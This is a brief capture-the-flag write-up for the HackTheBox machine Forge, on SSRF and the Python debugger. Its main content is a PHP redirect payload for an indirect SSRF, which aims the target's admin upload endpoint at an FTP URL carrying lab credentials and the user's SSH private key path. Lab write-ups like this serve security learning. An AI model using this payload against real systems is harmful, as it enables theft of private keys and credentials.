SSRF & Python Debugger - Forge @ HackTheBox
We are solving Forge, a medium difficulty Linux machine on HackTheBox which involves an SSRF & playing with the python debugger.
Notes
Indirect SSRF
1
2
3
<?php
header("Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@forge.htb/.ssh/id_rsa");
?>
This post is licensed under CC BY 4.0 by the author.